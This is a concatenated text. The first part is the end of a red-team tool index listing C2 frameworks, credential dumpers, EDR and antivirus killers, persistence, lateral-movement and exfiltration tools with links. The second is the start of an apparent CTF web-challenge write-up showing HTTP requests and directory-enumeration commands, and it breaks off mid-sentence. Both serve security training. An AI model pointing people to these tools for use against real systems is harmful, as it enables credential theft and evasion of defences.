and execute phishing engagements and security awareness training.|https://github.com/gophish/gophish|\n|PwnAuth|PwnAuth a web application framework for launching and managing OAuth abuse campaigns.|https://github.com/fireeye/PwnAuth|\n|Modlishka|Modlishka is a flexible and powerful reverse proxy, that will take your ethical phishing campaigns to the next level.|https://github.com/drk1wi/Modlishka|\n\n### Watering Hole Attack\n|Name|Description|URL|\n|-----|-----------|----|\n|BeEF|BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser|https://github.com/beefproject/beef|\n\n## Command and Control\n\n### Remote Access Tools (RAT)\n|Name|Description|URL|\n|-----|-----------|----|\n|Cobalt Strike|Cobalt Strike is software for Adversary Simulations and Red Team Operations.|https://cobaltstrike.com/|\n|Brute Ratel C4|Brute Ratel is the most advanced Red Team & Adversary Simulation Software in the current C2 Market.|https://bruteratel.com/|\n|Empire|Empire 5 is a post-exploitation framework that includes a pure-PowerShell Windows agent, and compatibility with Python 3.x Linux/OS X agents.|https://github.com/BC-SECURITY/Empire|\n|PoshC2|PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.|https://github.com/nettitude/PoshC2|\n|Koadic|Koadic C3 COM Command & Control - JScript RAT|https://github.com/zerosum0x0/koadic|\n|merlin|Merlin is a cross-platform post-exploitation Command & Control server and agent written in Go.|https://github.com/Ne0nd0g/merlin|\n|Mythic|A cross-platform, post-exploit, red teaming framework built with python3, docker, docker-compose, and a web browser UI.|https://github.com/its-a-feature/Mythic|\n|Covenant|Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.|https://github.com/cobbr/Covenant|\n|shad0w|A post exploitation framework designed to operate covertly on heavily monitored environments|https://github.com/bats3c/shad0w|\n|Sliver|Sliver is a general purpose cross-platform implant framework that supports C2 over Mutual-TLS, HTTP(S), and DNS.|https://github.com/BishopFox/sliver|\n|SILENTTRINITY|An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR|https://github.com/byt3bl33d3r/SILENTTRINITY|\n|Pupy|Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python|https://github.com/n1nj4sec/pupy|\n|Havoc|Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.|https://github.com/HavocFramework/Havoc|\n|NimPlant|A light first-stage C2 implant written in Nim and Python|https://github.com/chvancooten/NimPlant|\n|SharpC2|SharpC2 is a Command & Control (C2) framework written in C#. It consists of an ASP.NET Core Team Server, a .NET Framework implant, and a .NET MAUI client.|https://github.com/rasta-mouse/SharpC2|\n\n### Staging\n|Name|Description|URL|\n|-----|-----------|----|\n|pwndrop|Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.|https://github.com/kgretzky/pwndrop|\n|C2concealer|A command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.|https://github.com/FortyNorthSecurity/C2concealer|\n|FindFrontableDomains|Search for potential frontable domains|https://github.com/rvrsh3ll/FindFrontableDomains|\n|Domain Hunter|Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names|https://github.com/threatexpress/domainhunter|\n|RedWarden|Flexible CobaltStrike Malleable Redirector|https://github.com/mgeeky/RedWarden|\n|AzureC2Relay|AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.|https://github.com/Flangvik/AzureC2Relay|\n|C3|C3 (Custom Command and Control) is a tool that allows Red Teams to rapidly develop and utilise esoteric command and control channels (C2).|https://github.com/FSecureLABS/C3|\n|Chameleon|A tool for evading Proxy categorisation|https://github.com/mdsecactivebreach/Chameleon|\n|Cobalt Strike Malleable C2 Design and Reference Guide|Cobalt Strike Malleable C2 Design and Reference Guide|https://github.com/threatexpress/malleable-c2/|\n|redirect.rules|Quick and dirty dynamic redirect.rules generator|https://github.com/0xZDH/redirect.rules|\n|CobaltBus|Cobalt Strike External C2 Integration With Azure Servicebus, C2 traffic via Azure Servicebus|https://github.com/Flangvik/CobaltBus|\n|SourcePoint|SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.|https://github.com/Tylous/SourcePoint|\n|RedGuard|RedGuard is a C2 front flow control tool,Can avoid Blue Teams,AVs,EDRs check.|https://github.com/wikiZ/RedGuard|\n|skyhook|A round-trip obfuscated HTTP file transfer setup built to bypass IDS detections.|https://github.com/blackhillsinfosec/skyhook|\n\n### Log Aggregation\n|Name|Description|URL|\n|-----|-----------|----|\n|RedELK|Red Team's SIEM - tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.|https://github.com/outflanknl/RedELK|\n|Elastic for Red Teaming|Repository of resources for configuring a Red Team SIEM using Elastic.|https://github.com/SecurityRiskAdvisors/RedTeamSIEM|\n|RedEye|RedEye is a visual analytic tool supporting Red & Blue Team operations|https://github.com/cisagov/RedEye|\n\n## Situational Awareness\n### Host Situational Awareness\n|Name|Description|URL|\n|-----|-----------|----|\n|AggressiveProxy|AggressiveProxy is a combination of a .NET 3.5 binary (LetMeOutSharp) and a Cobalt Strike aggressor script (AggressiveProxy.cna). Once LetMeOutSharp is executed on a workstation, it will try to enumerate all available proxy configurations and try to communicate with the Cobalt Strike server over HTTP(s) using the identified proxy configurations.|https://github.com/EncodeGroup/AggressiveProxy|\n|Gopher|C# tool to discover low hanging fruits|https://github.com/EncodeGroup/Gopher|\n|SharpEDRChecker|Checks running processes, process metadata, Dlls loaded into your current process and the each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.|https://github.com/PwnDexter/SharpEDRChecker|\n|Situational Awareness BOF|This Repo intends to serve two purposes. First it provides a nice set of basic situational awareness commands implemented in BOF.|https://github.com/trustedsec/CS-Situational-Awareness-BOF|\n|Seatbelt|Seatbelt is a C# project that performs a number of security oriented host-survey \"safety checks\" relevant from both offensive and defensive security perspectives.|https://github.com/GhostPack/Seatbelt|\n|SauronEye|SauronEye is a search tool built to aid red teams in finding files containing specific keywords.|https://github.com/vivami/SauronEye|\n|SharpShares|Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain|https://github.com/mitchmoser/SharpShares|\n|SharpAppLocker|C# port of the Get-AppLockerPolicy PowerShell cmdlet with extended features. Includes the ability to filter and search for a specific type of rules and actions.|https://github.com/Flangvik/SharpAppLocker/|\n|SharpPrinter|Printer is a modified and console version of ListNetworks|https://github.com/rvrsh3ll/SharpPrinter|\n\n\n### Domain Situational Awareness\n|Name|Description|URL|\n|-----|-----------|----|\n|StandIn|StandIn is a small AD post-compromise toolkit. StandIn came about because recently at xforcered we needed a .NET native solution to perform resource based constrained delegation.|https://github.com/FuzzySecurity/StandIn|\n|Recon-AD|An AD recon tool based on ADSI and reflective DLL’s|https://github.com/outflanknl/Recon-AD|\n|BloodHound|Six Degrees of Domain Admin|https://github.com/BloodHoundAD/BloodHound|\n|PSPKIAudit|PowerShell toolkit for auditing Active Directory Certificate Services (AD CS).|https://github.com/GhostPack/PSPKIAudit|\n|SharpView|C# implementation of harmj0y's PowerView|https://github.com/tevora-threat/SharpView|\n|Rubeus|Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license). |https://github.com/GhostPack/Rubeus|\n|nanorobeus|A minimalistic tool for managing Kerberos tickets. Supports redteam frameworks|https://github.com/wavvs/nanorobeus|\n|Grouper|A PowerShell script for helping to find vulnerable settings in AD Group Policy. (deprecated, use Grouper2 instead!)|https://github.com/l0ss/Grouper|\n|ImproHound|Identify the attack paths in BloodHound breaking your AD tiering|https://github.com/improsec/ImproHound|\n|ADRecon|ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.|https://github.com/adrecon/ADRecon|\n|ADCSPwn|A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service.|https://github.com/bats3c/ADCSPwn|\n\n\n## Credential Dumping\n|Name|Description|URL|\n|-----|-----------|----|\n|Mimikatz|Mimikatz is an open-source application that allows users to view and save authentication credentials like Kerberos tickets.|https://github.com/gentilkiwi/mimikatz|\n|Dumpert|LSASS memory dumper using direct system calls and API unhooking.|https://github.com/outflanknl/Dumpert|\n|CredBandit| CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel.|https://github.com/xforcered/CredBandit|\n|CloneVault|CloneVault allows a red team operator to export and import entries including attributes from Windows Credential Manager. |https://github.com/mdsecactivebreach/CloneVault|\n|SharpLAPS|Retrieve LAPS password from LDAP|https://github.com/swisskyrepo/SharpLAPS|\n|SharpDPAPI|SharpDPAPI is a C# port of some DPAPI functionality from @gentilkiwi's Mimikatz project.|https://github.com/GhostPack/SharpDPAPI|\n|KeeThief|Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system.|https://github.com/GhostPack/KeeThief|\n|SafetyKatz|SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader.|https://github.com/GhostPack/SafetyKatz|\n|forkatz|credential dump using forshaw technique using SeTrustedCredmanAccessPrivilege|https://github.com/Barbarisch/forkatz|\n|PPLKiller|Tool to bypass LSA Protection (aka Protected Process Light)|https://github.com/RedCursorSecurityConsulting/PPLKiller|\n|LaZagne|The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.|https://github.com/AlessandroZ/LaZagne|\n|AndrewSpecial|AndrewSpecial, dumping lsass' memory stealthily and bypassing \"Cilence\" since 2019.|https://github.com/hoangprod/AndrewSpecial|\n|Net-GPPPassword|.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.|https://github.com/outflanknl/Net-GPPPassword|\n|SharpChromium|.NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins.|https://github.com/djhohnstein/SharpChromium|\n|Chlonium|Chlonium is an application designed for cloning Chromium Cookies.|https://github.com/rxwx/chlonium|\n|SharpCloud|SharpCloud is a simple C# utility for checking for the existence of credential files related to Amazon Web Services, Microsoft Azure, and Google Compute.|https://github.com/chrismaddalena/SharpCloud|\n|pypykatz|Mimikatz implementation in pure Python. At least a part of it :)|https://github.com/skelsec/pypykatz|\n|nanodump|A Beacon Object File that creates a minidump of the LSASS process.|https://github.com/helpsystems/nanodump|\n|Koh|Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.|https://github.com/GhostPack/Koh|\n\n## Privilege Escalation\n|Name|Description|URL|\n|-----|-----------|----|\n|ElevateKit|The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.|https://github.com/rsmudge/ElevateKit|\n|Watson|Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.|https://github.com/rasta-mouse/Watson|\n|SharpUp|SharpUp is a C# port of various PowerUp functionality. Currently, only the most common checks have been ported; no weaponization functions have yet been implemented.|https://github.com/GhostPack/SharpUp|\n|dazzleUP|A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems. dazzleUP detects the following vulnerabilities.|https://github.com/hlldz/dazzleUP|\n|PEASS|Privilege Escalation Awesome Scripts SUITE (with colors)|https://github.com/carlospolop/PEASS-ng|\n|SweetPotato|A collection of various native Windows privilege escalation techniques from service accounts to SYSTEM|https://github.com/CCob/SweetPotato|\n|MultiPotato| Another Potato to get SYSTEM via SeImpersonate privileges |https://github.com/S3cur3Th1sSh1t/MultiPotato|\n|KrbRelayUp|a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).|https://github.com/Dec0ne/KrbRelayUp|\n|GodPotato|As Long as You Have the ImpersonatePrivilege Permission, Then You are the SYSTEM!|https://github.com/BeichenDream/GodPotato|\n\n## Defense Evasion\n|Name|Description|URL|\n|-----|-----------|----|\n|RefleXXion|RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc.|https://github.com/hlldz/RefleXXion|\n|EDRSandBlast|EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections.|https://github.com/wavestone-cdt/EDRSandblast|\n|unDefender|Killing your preferred antimalware by abusing native symbolic links and NT paths.|https://github.com/APTortellini/unDefender|\n|Backstab|A tool to kill antimalware protected processes|https://github.com/Yaxser/Backstab|\n|SPAWN - Cobalt Strike BOF|Cobalt Strike BOF that spawns a sacrificial process, injects it with shellcode, and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing.|https://github.com/boku7/spawn|\n|BOF.NET - A .NET Runtime for Cobalt Strike's Beacon Object Files|BOF.NET is a small native BOF object combined with the BOF.NET managed runtime that enables the development of Cobalt Strike BOFs directly in .NET. BOF.NET removes the complexity of native compilation along with the headaches of manually importing native API.|https://github.com/CCob/BOF.NET|\n|NetLoader|Loads any C# binary from filepath or url, patching AMSI and bypassing Windows Defender on runtime|https://github.com/Flangvik/NetLoader|\n|FindObjects-BOF|A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific modules or process handles.|https://github.com/outflanknl/FindObjects-BOF|\n|SharpUnhooker|C# Based Universal API Unhooker - Automatically Unhook API Hives (ntdll.dll,kernel32.dll,user32.dll,advapi32.dll,and kernelbase.dll).|https://github.com/GetRektBoy724/SharpUnhooker|\n|EvtMute|Apply a filter to the events being reported by windows event logging|https://github.com/bats3c/EvtMute|\n|InlineExecute-Assembly|InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module|https://github.com/xforcered/InlineExecute-Assembly|\n|Phant0m | Windows Event Log Killer|https://github.com/hlldz/Phant0m|\n|SharpBlock|A method of bypassing EDR's active projection DLL's by preventing entry point execution.|https://github.com/CCob/SharpBlock|\n|NtdllUnpatcher|Example code for EDR bypassing, please use this for testing blue team detection capabilities against this type of malware that will bypass EDR's userland hooks.|https://github.com/Kharos102/NtdllUnpatcher|\n|DarkLoadLibrary|LoadLibrary for offensive operations.|https://github.com/bats3c/DarkLoadLibrary|\n|BlockETW|.Net 3.5 / 4.5 Assembly to block ETW telemetry in a process|https://github.com/Soledge/BlockEtw|\n|firewalker|This repo contains a simple library which can be used to add FireWalker hook bypass capabilities to existing code|https://github.com/mdsecactivebreach/firewalker|\n|KillDefenderBOF|Beacon Object File PoC implementation of KillDefender|https://github.com/Cerbersec/KillDefenderBOF|\n|Mangle|Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL) to avoid detection from EDRs|https://github.com/optiv/Mangle|\n|AceLdr|Cobalt Strike UDRL for memory scanner evasion.|https://github.com/kyleavery/AceLdr|\n|AtomLdr|CA DLL loader with advanced evasive features|https://github.com/NUL0x4C/AtomLdr|\n|Inline-Execute-PE|Execute unmanaged Windows executables in CobaltStrike Beacons|https://github.com/Octoberfest7/Inline-Execute-PE|\n|SigFlip|SigFlip is a tool for patching authenticode signed PE files (exe, dll, sys ..etc) without invalidating or breaking the existing signature.|https://github.com/med0x2e/SigFlip|\n|Blackout|kill anti-malware protected processes (BYOVD)|https://github.com/ZeroMemoryEx/Blackout|\n\n## Persistence\n|Name|Description|URL|\n|-----|-----------|----|\n|SharpStay|.NET project for installing Persistence|https://github.com/0xthirteen/SharpStay|\n|SharPersist|Windows persistence toolkit written in C#.|https://github.com/fireeye/SharPersist|\n|SharpHide|Tool to create hidden registry keys.|https://github.com/outflanknl/SharpHide|\n|DoUCMe|This leverages the NetUserAdd Win32 API to create a new computer account. This is done by setting the usri1_priv of the USER_INFO_1 type to 0x1000.|https://github.com/Ben0xA/DoUCMe|\n|A Black Path Toward The Sun|(TCP tunneling over HTTP for web application servers)|https://github.com/nccgroup/ABPTTS|\n|pivotnacci|A tool to make socks connections through HTTP agents|https://github.com/blackarrowsec/pivotnacci|\n|reGeorg|The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.|https://github.com/sensepost/reGeorg|\n|DAMP|The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.|https://github.com/HarmJ0y/DAMP|\n|IIS-Raid|A native backdoor module for Microsoft IIS (Internet Information Services)|https://github.com/0x09AL/IIS-Raid|\n|SharPyShell|tiny and obfuscated ASP.NET webshell for C# web applications|https://github.com/antonioCoco/SharPyShell|\n|ScheduleRunner|A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation|https://github.com/netero1010/ScheduleRunner|\n|SharpEventPersist|Persistence by writing/reading shellcode from Event Log|https://github.com/improsec/SharpEventPersist|\n|Kraken|Kraken, a modular multi-language webshell coded by @secu_x11.|https://github.com/kraken-ng/Kraken|\n|HiddenDesktop|HVNC for Cobalt Strike|https://github.com/WKL-Sec/HiddenDesktop|\n\n## Lateral Movement\n|Name|Description|URL|\n|-----|-----------|----|\n|Liquid Snake|LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript|https://github.com/RiccardoAncarani/LiquidSnake|\n|PowerUpSQL|A PowerShell Toolkit for Attacking SQL Server|https://github.com/NetSPI/PowerUpSQL|\n|SQLRecon|A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation.|https://github.com/skahwah/SQLRecon|\n|SCShell|Fileless lateral movement tool that relies on ChangeServiceConfigA to run command|https://github.com/Mr-Un1k0d3r/SCShell|\n|SharpRDP|Remote Desktop Protocol Console Application for Authenticated Command Execution|https://github.com/0xthirteen/SharpRDP|\n|MoveKit|Movekit is an extension of built in Cobalt Strike lateral movement by leveraging the execute_assembly function with the SharpMove and SharpRDP .NET assemblies.|https://github.com/0xthirteen/MoveKit|\n|SharpNoPSExec|File less command execution for lateral movement.|https://github.com/juliourena/SharpNoPSExec|\n|Responder/MultiRelay|LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.|https://github.com/lgandx/Responder|\n|impacket|Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.|https://github.com/SecureAuthCorp/impacket|\n|Farmer|Farmer is a project for collecting NetNTLM hashes in a Windows domain. |https://github.com/mdsecactivebreach/Farmer|\n|CIMplant|C# port of WMImplant which uses either CIM or WMI to query remote systems. It can use provided credentials or the current user's session.|https://github.com/FortyNorthSecurity/CIMplant|\n|PowerLessShell|PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.|https://github.com/Mr-Un1k0d3r/PowerLessShell|\n|SharpGPOAbuse|SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.|https://github.com/FSecureLABS/SharpGPOAbuse|\n|kerbrute|A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication|https://github.com/ropnop/kerbrute|\n|mssqlproxy|mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse|https://github.com/blackarrowsec/mssqlproxy|\n|Invoke-TheHash|PowerShell Pass The Hash Utils|https://github.com/Kevin-Robertson/Invoke-TheHash|\n|InveighZero|.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers|https://github.com/Kevin-Robertson/InveighZero|\n|SharpSpray|SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.|https://github.com/jnqpblc/SharpSpray|\n|CrackMapExec|A swiss army knife for pentesting networks|https://github.com/byt3bl33d3r/CrackMapExec|\n|SharpAllowedToAct|A C# implementation of a computer object takeover through Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity) based on the research by @elad_shamir.|https://github.com/pkb1s/SharpAllowedToAct|\n|SharpRDPHijack|Sharp RDP Hijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions|https://github.com/bohops/SharpRDPHijack|\n|CheeseTools|This repository has been made basing onto the already existing MiscTool, so big shout-out to rasta-mouse for releasing them and for giving me the right motivation to work on them.|https://github.com/klezVirus/CheeseTools|\n|SharpSpray|SharpSpray is a Windows domain password spraying tool written in .NET C#.|https://github.com/iomoath/SharpSpray|\n|MalSCCM|This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage.|https://github.com/nettitude/MalSCCM\n|Coercer|A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.|https://github.com/p0dalirius/Coercer|\n|SharpSploit|SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.|https://github.com/cobbr/SharpSploit|\n|orpheus|Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types|https://github.com/trustedsec/orpheus|\n|Chisel|Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server.|https://github.com/jpillora/chisel|\n|frp|frp is a fast reverse proxy that allows you to expose a local server located behind a NAT or firewall to the Internet.|https://github.com/fatedier/frp|\n\n## Exfiltration\n|Name|Description|URL|\n|-----|-----------|----|\n|SharpExfiltrate|Modular C# framework to exfiltrate loot over secure and trusted channels.|https://github.com/Flangvik/SharpExfiltrate|\n|DNSExfiltrator|Data exfiltration over DNS request covert channel|https://github.com/Arno0x/DNSExfiltrator|\n|Egress-Assess|Egress-Assess is a tool used to test egress data detection capabilities.|https://github.com/FortyNorthSecurity/Egress-Assess|\n\n## Miscellaneous\n### Threat-informed Defense\n|Name|Description|URL|\n|-----|-----------|----|\n|Tidal Cyber|Tidal Cyber helps enterprise organizations to define, measure, and improve their defenses to address the adversary behaviors that are most important to them.|https://app.tidalcyber.com|\n|Control Validation Compass|Threat modeling aide & purple team content repository, pointing security & intelligence teams to 10,000+ publicly-accessible technical and policy controls and 2,100+ offensive security tests, aligned with nearly 600 common attacker techniques|https://controlcompass.github.io|\n\n### Cloud\n#### Amazon Web Services (AWS)\n|Name|Description|URL|\n|-----|-----------|----|\n|pacu|The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.|https://github.com/RhinoSecurityLabs/pacu|\n|CloudMapper|CloudMapper helps you analyze your Amazon Web Services (AWS) environments.|https://github.com/duo-labs/cloudmapper|\n|Enumerate IAM permissions|Enumerate the permissions associated with AWS credential set|https://github.com/andresriancho/enumerate-iam|\n\n#### Azure\n|Name|Description|URL|\n|-----|-----------|----|\n|Azure AD Connect password extraction|This toolkit offers several ways to extract and decrypt stored Azure AD and Active Directory credentials from Azure AD Connect servers.|https://github.com/fox-it/adconnectdump|\n|Storm Spotter|Azure Red Team tool for graphing Azure and Azure Active Directory objects|https://github.com/Azure/Stormspotter|\n|ROADtools|The Azure AD exploration framework.|https://github.com/dirkjanm/ROADtools|\n|MicroBurst: A PowerShell Toolkit for Attacking Azure|A collection of scripts for assessing Microsoft Azure security|https://github.com/NetSPI/MicroBurst|\n|AADInternals|AADInternals PowerShell module for administering Azure AD and Office 365|https://github.com/Gerenios/AADInternals|\n|TeamFiltration|TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts.|https://github.com/Flangvik/TeamFiltration|\n|MAAD Attack Framework|An attack tool for simple, fast & effective security testing of M365 & Azure AD.|https://github.com/vectra-ai-research/MAAD-AF|\n\n### Adversary Emulation\n|Name|Description|URL|\n|-----|-----------|----|\n|Stratus Red Team|Stratus Red Team is \"Atomic Red Team™\" for the cloud, allowing to emulate offensive attack techniques in a granular and self-contained manner.|https://github.com/DataDog/stratus-red-team|\n|Prelude Operator|A Platform for Developer-first advanced security· Defend your organization by mimicking real adversarial attacks.|https://www.preludesecurity.com/products/operator|\n|Prelude Build|An open source IDE for authoring, testing, and verifying production-ready security tests..|https://www.preludesecurity.com/products/build|\n|Caldera|An automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks.|https://github.com/mitre/caldera|\n|APTSimulator|A Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised.|https://github.com/NextronSystems/APTSimulator|\n|Atomic Red Team|Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.|https://github.com/redcanaryco/atomic-red-team|\n|Network Flight Simulator|flightsim is a lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility.|https://github.com/alphasoc/flightsim|\n|Metta|A security preparedness tool to do adversarial simulation.|https://github.com/uber-common/metta|\n|Red Team Automation (RTA)| RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.|https://github.com/endgameinc/RTA|\n\n### Living Off the Living Off the Land\n|Name|Description|URL|\n|-----|-----------|----|\n|Living Off The Land Drivers|Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks|https://www.loldrivers.io/|\n|GTFOBins|GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems|https://gtfobins.github.io|\n|LOLBAS|The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques|https://lolbas-project.github.io/|\n|Living Off Trusted Sites (LOTS) Project|Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allow attackers to use their domain or subdomain|https://lots-project.com|\n|Filesec|Stay up-to-date with the latest file extensions being used by attackers.|https://filesec.io/|\n|LOOBins|Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in macOS binaries and how they can be used by threat actors for malicious purposes.|https://www.loobins.io/|\n|WTFBins|WTFBin(n): a binary that behaves exactly like malware, except, somehow, it's not? This project aims to catalogue benign applications that exhibit suspicious behavior. These binaries can emit noise and false positives in threat hunting and automated detections.|https://wtfbins.wtf/|\n|Hijack Libs|This project provides an curated list of DLL Hijacking candidates|https://hijacklibs.net|\n\n### Red Team Scripts\n|Name|Description|URL|\n|-----|-----------|----|\n|RedTeamCCode|Red Team C code repo|https://github.com/Mr-Un1k0d3r/RedTeamCCode|\n|EDRs|This repo contains information about EDRs that can be useful during red team exercise.|https://github.com/Mr-Un1k0d3r/EDRs|\n|Cobalt Strike Community Kit|Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike.|https://cobalt-strike.github.io/community_kit/|\n\n### Red Team Infrastructure\n|Name|Description|URL|\n|-----|-----------|----|\n|Red Team Infrastructure Wiki|Wiki to collect Red Team infrastructure hardening resources|https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki|\n\n## License\n[![CC0](http://mirrors.creativecommons.org/presskit/buttons/88x31/svg/cc-zero.svg)](http://creativecommons.org/publicdomain/zero/1.0)\n\nTo the extent possible under law, Rahmat Nurfauzi &#34;@infosecn1nja&#34; has waived all copyright and related or neighboring rights to this work.\n"}}},{"rowIdx":315,"cells":{"text":{"kind":"string","value":"# WEB CHALLENGE: GRAMMAR\n\n## Challenge Description\nWhen we access this page we get a Forbidden error. However we believe that something strange lies behind... Can you find a way in and retrieve the flag? \n\n```\nhost: 88.198.233.174 port:37337\n```\n\n\n\n### BURPSUITE\n\nLet's see what does burpsuite tell us..\n\n```\n\nGET / HTTP/1.1\nHost: 88.198.233.174:37337\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n```\n\n```\n\nHTTP/1.1 403 Forbidden\nDate: Wed, 27 Dec 2017 07:36:52 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Length: 292\nConnection: close\nContent-Type: text/html; charset=iso-8859-1\n\n\n403 Forbidden\n\n

Forbidden

\n

You don't have permission to access / on this server.
\n

\n
\n
Apache/2.4.18 (Ubuntu) Server at 88.198.233.174 Port 37337
\n\n
\n```\n\n### ENUMERATE\n\nWell, if we don't have permission to hit `/`, then we need to enumerate our way\nto another access point..\n\n```\n$ dirb http://88.198.233.174:37337 /usr/share/wordlists/dirb/small.txt -w\n\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nSTART_TIME: Wed Dec 27 02:44:35 2017\nURL_BASE: http://88.198.233.174:37337/\nWORDLIST_FILES: /usr/share/wordlists/dirb/small.txt\nOPTION: Not Stopping on warning messages\n\n-----------------\n\nGENERATED WORDS: 959 \n\n---- Scanning URL: http://88.198.233.174:37337/ ----\n(!) WARNING: All responses for this directory seem to be CODE = 403. \n (Use mode '-w' if you want to scan it anyway)\n-----------------\nEND_TIME: Wed Dec 27 02:52:09 2017\nDOWNLOADED: 959 - FOUND: 0\n```\n\n```\n$ gobuster -e -u 88.198.233.174:37337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n\nGobuster v1.2 OJ Reeves (@TheColonial)\n=====================================================\n[+] Mode : dir\n[+] Url/Domain : http://88.198.233.174:37337/\n[+] Threads : 10\n[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n[+] Status codes : 204,301,302,307,200\n[+] Expanded : true\n=====================================================\n```\n\n```\n$ wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/megabeast.txt --hs Forbi http://88.198.233.174:37337/FUZZ.php\n```\n\n.. so this doesn't get us anywhere.\n\n### POST REQUEST?\n\nWhat if instead of doing a GET request, we turned it into a POST 